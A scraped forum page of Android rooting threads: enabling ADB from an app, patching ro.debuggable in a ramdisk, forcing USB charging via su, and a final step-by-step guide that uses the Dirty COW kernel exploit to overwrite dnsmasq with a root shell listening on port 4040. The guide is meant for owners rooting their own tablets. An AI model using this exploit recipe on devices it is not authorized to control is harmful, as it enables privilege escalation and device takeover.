Hello again, and thanks in advance for all your help.
Without going into excessive detail about my project, here is what I need to accomplish:
I want to be able to turn on USB Debugging (ADB) from within my app. For simplicity, lets just say I want to create a clone of the developer settings page, where a checkbox can turn USB Debugging on and off.
I know this can be done through terminal applications by typing:
Code:
setprop persist.service.adb.enable 1
Currently, my code is trying something like this:
Code:
Process process = Runtime.getRuntime().exec(
new String[]{"setprop", "persist.service.adb.enable", "1"});
This isn't giving me any errors or exceptions, but it is also not changing the value. I assume this is a permission issue. I know this isn't designed to be allowed by Android for security reasons, and this isn't an app that I will try and release. This is just for a single-purpose device, (a Galaxy Tab if that is relevant).
My goal here is to NOT have to enable permanent root on the device. I am able to accomplish what I'm attempting by rooting the device, and calling "su" before my setprop commands. For security reasons, I would prefer to NOT have su even available on the device. I am hoping that I can make whatever changes I need during a temporary root (using rageagainstthecage method) and then not have root after the device is restarted.
I'm fairly new to Linux, so all of my knowledge of it is limited to what I have learned from Android and my rooting experience. I was thinking that if I made a shell script that called setprop for me, I could somehow give that permission to run as root, and simply run that script from my app? The script would be something very simple like this:
Code:
echo Running ENABLE Debugging Script
setprop persist.service.adb.enable 1
Then I could call if from my app with:
Code:
Process process = Runtime.getRuntime().exec(
new String[]{"/pathToScript/enableDebugScript.sh"});
Does anyone know how (I assume through use of CHMOD?) I could give this script permission to run as root? Or is there a better way to execute shell commands with elevated privledges from within a standard Android application?
Thanks for all the help, let me know if I can clarify anything. As always, I appreciate the assistance.
Related
hello!!
is there someone that managed to obtain root acces? if that's true, please tell me what method you used and how it went...
Root Access is quite easy to Achieve.
[GUIDE] All Tattoo questions and answers see here (from A to Z)!
http://forum.xda-developers.com/showthread.php?t=716282
1. How can I root my phone?
1.1 General information/Basic adb-commands
Rooting a phone enables you to do things, which normally aren't possible for the average user like:
- Removing apps which were preinstalled by the provider (like Orange, Vodafone, etc.). My Tattoo had Vodafone apps for buying music and other sh*t, which was installed on the system partition (to which a "normal" user has no rights to write to, including deleting).
The Tattoo was successfully rooted by a bunch of guys here, namely -bm-, mainfram3 and Coburn64 (maybe, I don't remember quite correctly ). Also the Tattoo was the first phone having a security mechanism hindering a user to mount the filesystems as read/write, which had to be overridden by remapping the read only memory region to a read/write one. This is done by the module Tattoo-hack.ko, also made by mainfram3. He also created the first boot.img, which enabled su directly from adb and loading Tattoo-hack directly from boot on.
A few words about adb:
ADB is a tool for communicating from the PC with the mobile phone. For this a service is running on the phone enabling the communication via Terminal Emulator. Here are the most useful adb-commands:
Click to expand...
Click to collapse
Code:
adb push localFileFromPC /path/on/mobilephone
-> pushes a file "localFileFromPC" to a specified location on the phone
adb pull /path/to/file pathFromPC
-> receives a file from the phone and stores it to "pathFromPC"
adb remount
-> This is only possible in custom ROMs, remounts the file system to r/w automatically
adb shell "command"
-> executes "command" and returns to the computer shell
adb shell
-> opens a shell session on the phone (from here on you have to be very careful! Also you can execute now normal linux commands like rm, mv, ls, chmod and so on, but not cp (this can done through busybox)). You will have to use this more often, so get used to it ;)
Discovering "adb shell" gave joy, experiencing the shell as minimal bash with awful line handling (backspace and command recall) gave annoyance, experiencing "adb root" refusing access gave frustration.
After some tracking, it turns out that adbd behaviour is determined by the property "ro.debuggable" which is set during system init. The initial value is located in the file "/default.prop". In JP6 it is set to 0 resulting is adbd refusing access. However, set to 1, "adbd root" will give the much better response of "restarting adbd as root".
Once set, the property value cannot be changed. To get this fixed you need to change the contents of the file default.prop which is located in the initial ramdisk image.
Optionally, you can put a replacement shell in /sbin of in ramdisk image so that when connected "exec bash" will make things more relaxing. I attached the version I am using, which is statically linked with ncurses/readline.
There is also a simple patch to unlock adbd if you dislike opening and rebuilding the ramdisk image. However, you do need binoffset which is located in the scripts directory of the linux source tree.
Code:
ofs=`scripts/binoffset initramfs.cpio \`echo -n 'debuggable=0' | od -t u1 -An\` 2>/dev/null`
echo 'debuggable=1' | dd bs=1 seek=$ofs conv=notrunc of=initramfs.cpio
Thanks...any help though?
Hi....thanks for the fix....could you point me to a decent howto on editting the initial ramdisk?
Thanks
M
it doesn't sound simple
i will try to figure that one out ...
Dear Hexabit,
I know it's an old topic.
But do you know how can I use this Fix on a windows 7?
tried searching for binoffset software/script..couldn't find anything
I have a Flytouch 3 tablet, rooted(Z4) with terminal emulator and root explorer.
is there a way to use you bash.rar to unlock adb access?
thanks for the help
doekoe87 said:
Dear Hexabit,
I know it's an old topic.
But do you know how can I use this Fix on a windows 7?
tried searching for binoffset software/script..couldn't find anything
I have a Flytouch 3 tablet, rooted(Z4) with terminal emulator and root explorer.
is there a way to use you bash.rar to unlock adb access?
thanks for the help
Click to expand...
Click to collapse
you have to split the kernel, then decompile the ramdisk and edit default.prop and change ro.debuggable to 1, then recompile and flash
confuse but giving me a clue
I use unpackbootimg in my ubuntu pc.
The adb root works not properly after set debuggable=1.
When I saw your thread that told the adbd should be unlocked too, then I replace the adbd with a unlocked one. It works!
Thanks for your help.
I am sorry but I don't understand how to use the file.
teoking said:
I use unpackbootimg in my ubuntu pc.
The adb root works not properly after set debuggable=1.
When I saw your thread that told the adbd should be unlocked too, then I replace the adbd with a unlocked one. It works!
Thanks for your help.
Click to expand...
Click to collapse
Hi,
I can upload nothing to my root catalog of my phone.
So how could I use the adbd file in this case?
Phone is rooted but I have a problem with adb root command like subject of this topic is.
Can u help me with the process because I kept the file in /sbin but still it's not working.
Active system
Sent from my SM-G900T3 using Tapatalk
Hi guys,
could anyone explain me please how to enable usb charging with Pershoot´s Kernel (boot-cm_2636.4_ux-oc-xtra-vfpv3-d16_fp-101811)?
I rly don´t get this:
adb shell echo 1 > /sys/class/power_supply/battery/force_usb_charging
Thank you very much.
Sure bud,
The script you posted is meant to be run in a command prompt using the tablet's ADB interface. To access this you need the Android SDK (that is the tool for app development) installed on your PC. You can look up how to do this all over the interweb.
To make your life easier though, download a terminal emulator app from the Market, there are plenty of free ones. Once you've done that open it and run the script as follows
su
echo 1 > /sys/class/power_supply/battery/force_usb_charging
The "su" command gives you root access just as "adb shell" would in command prompt.
The catch is the script is not persistent after reboot. So you will need to run it again if you reboot the tab. This doesn't really bother me cause I only use it for charging in the car and it takes like 30 seconds to type in the script.
Enjoy!
Thank you very much!
Now it´s working.
FillTheVoid said:
Sure bud,
The script you posted is meant to be run in a command prompt using the tablet's ADB interface. To access this you need the Android SDK (that is the tool for app development) installed on your PC. You can look up how to do this all over the interweb.
To make your life easier though, download a terminal emulator app from the Market, there are plenty of free ones. Once you've done that open it and run the script as follows
su
echo 1 > /sys/class/power_supply/battery/force_usb_charging
The "su" command gives you root access just as "adb shell" would in command prompt.
The catch is the script is not persistent after reboot. So you will need to run it again if you reboot the tab. This doesn't really bother me cause I only use it for charging in the car and it takes like 30 seconds to type in the script.
Enjoy!
Click to expand...
Click to collapse
how do you make it stick ?
I ask this question in another forum and the result was, it´s not possible (maybe wrong).
By the way, after I enable USB charge, my notebook can´t find my Tab anymore.
Mondfahrer said:
I ask this question in another forum and the result was, it´s not possible (maybe wrong).
By the way, after I enable USB charge, my notebook can´t find my Tab anymore.
Click to expand...
Click to collapse
I found a way to very easily get it running.
download terminal emulator.
Go to system preference of terminal emulator and there is an option to enter initial command to after you start terminal emulator.
so just type in:
su - root
echo 1 > /sys/class/power_supply/battery/force_usb_charging
Whenever you start teminal emulator, it will enable usb charging
I use this app to NTSF http://forum.xda-developers.com/showpost.php?p=13337600&postcount=6
Many of the root tools/apps such as screencast, Helium... allow an option to start a background service through adb shell, and then connect to this service to execute commands with elevated permissions.
My idea is around generalizing this experience. There is only one app that starts a background service and acts as a proxy for all other apps (like the SuperSu app).
To make this interaction compatible with all root apps, I was thinking to writing a shell script "su" which redirects all the arguments to the above service.
This will give users with non-rooted devices access to many of the root apps.
But this will require the "su" script to be in the $PATH directory.
[Q] Is there a way to change the $PATH variable from adb shell (without root) so that it is retained system-wide? Any alternatives?
Further research proves this has been done before, although perhaps not on our device. While root in a technical sense, it's severely SElinux-limited & thus not of significant utility as it is. I've made some inroads re. patching init going toward full root, but nothing certain yet. Either way, what exists should be enough to get us to an unlocked bootloader if we can get our hands on the right CID & aboot.
------
This is how I achieved temproot on the P605V. This is not a permanent root as, since our tablets run a Samsung eMMC and are/should be vulnerable to the eMMC bug, if we have the right CID and aboot & if my understanding is correct, we can convert these to developer units and unlock their bootloader!
What this basically does is downgrade to a dirtycow-vulnerable kernel & launch a temporary root shell. At the moment it can't do much as it runs within dnsmasq's SElinux context, but it's a start.
This does not apply if you're on 4.4.2, there are probably better rooting methods then. Do not upgrade to 5.1.1 in that case as you will burn fuses and will be unable to downgrade back to 4.4.2.
However, we can still crossflash between 5.1.1 versions! For our tablet, there are two: P605VVRSDPL1 (latest, patched) and P605VVRUDOH2 (earlier, unpatched). You must downgrade to P605VVRUDOH2. You will need the P605VVRUDOH2 tar.md5 and Odin - this is covered extensively for every Samsung device (including the non-VZW version of ours) so I will not repeat it here.
Once you're on P605VVRUDOH2, go through the initial setup, enable Developer Tools, then enable ADB.
The manual process (compiling from source):
Spoiler
You will need to obtain the following (on Linux, not tested on Windows):
- the Android 22 NDK
- https://github.com/timwr/CVE-2016-5195
- https://github.com/freddierice/trident
0. If you don't yet have it installed, install the Android NDK. I don't usually compile for Android, so I installed Android Studio from https://developer.android.com/studio/#downloads and added NDK 22 from its menus. You can likely (and perhaps should) use an earlier NDK, such as 14 or 15. Your mileage may vary.
1. Extract CVE-2016-5195 and trident
2. In CVE-2016-5195, rename 'run-as.c' to 'old-run-as.c'
3. Copy 'reverse.c' from trident into CVE-2016-5195
4. In CVE-2016-5195, rename the copied 'reverse.c' to 'run-as.c' - we're basically replacing the original payload from CVE-2016-5195 with a reverse shell from trident
5. Edit the Makefile and replace the 'root: push' section as follows:
root: push
adb shell 'chmod 777 /data/local/tmp/dcow'
adb push libs/$(ARCH)/run-as /data/local/tmp/run-as
adb shell '/data/local/tmp/dcow /data/local/tmp/run-as /system/bin/dnsmasq'
6. Run 'make root'
7. On the tablet, go into Settings -> More networks -> Mobile Hotspot, and turn it on. You will need a SIMcard to do this, any SIM will do - even if the device is still Verizon-locked. As we've written our reverse root shell spawning code into dnsmasq, and dnsmasq as root, our shell will run as root as well!
8. Verify it worked by running 'adb shell' and running 'netstat' - you should see a process listening on 0.0.0.0:4040. That's our shell! If you run 'ps' you should also see /system/bin/dnsmasq followed by /system/bin/shell, both running as root.
9. Run 'adb forward tcp:4040 tcp:4040'
10. Run netcat to connect to the shell: 'nc localhost 4040' (on Windows, you can get a precompiled netcat binary from http://nmap.org/dist/ncat-portable-5.59BETA1.zip )
11. Profit!
The precompiled process (easier, binaries attached to this post):
Spoiler
1. Download and unzip the attached package.
2. Open up a shell/command prompt, change into the directory you unzipped the files into, and run:
adb push dcow /data/local/tmp/dcow
adb push rshell /data/local/tmp/rshell
adb shell 'chmod 777 /data/local/tmp/*'
adb shell '/data/local/tmp/dcow /data/local/tmp/rshell /system/bin/dnsmasq'
3. On the tablet, go into Settings -> More networks -> Mobile Hotspot, and turn it on. You will need a SIMcard to do this, any SIM will do - even if the device is still Verizon-locked. As we've written our reverse root shell spawning code into dnsmasq, and dnsmasq as root, our shell will run as root as well!
4. Verify it worked by running 'adb shell' and running 'netstat' - you should see a process listening on 0.0.0.0:4040. That's our shell! If you run 'ps' you should also see /system/bin/dnsmasq followed by /system/bin/shell, both running as root.
5. Run 'adb forward tcp:4040 tcp:4040'
6. Run netcat to connect to the shell: 'nc localhost 4040' (on Windows, you can get a precompiled netcat binary from http://nmap.org/dist/ncat-portable-5.59BETA1.zip )
7. Profit!
Keep in mind, this is only temporary; a reboot will clear it and you'll have to exploit again. It is also not an extensive root as my end goal is to unlock the bootloader and get rid of the (awful) stock firmware.
Credits to timwr and all involved in the dirtycow exploit, freddierice for trident, as well as everyone on XDA whose research and comments over the past 4 years pointed me in the right direction. This tablet is still quite decent in 2020/2021, it deserves to be "free"!
----
As I understand it, as per @beaups https://github.com/beaups/SamsungCID & SamDunk, we will need two things - I hope someone in the community will volunteer these!
1. A dev-edition CID
2. An aboot dump from a dev-edition P605V (I'm not sure the regular P605 will work)
@ryanbg has made much inroad here as well. All input/assistance is appreciated!
Should these turn out to be unobtainium in some time, I will look into a permanent root solution.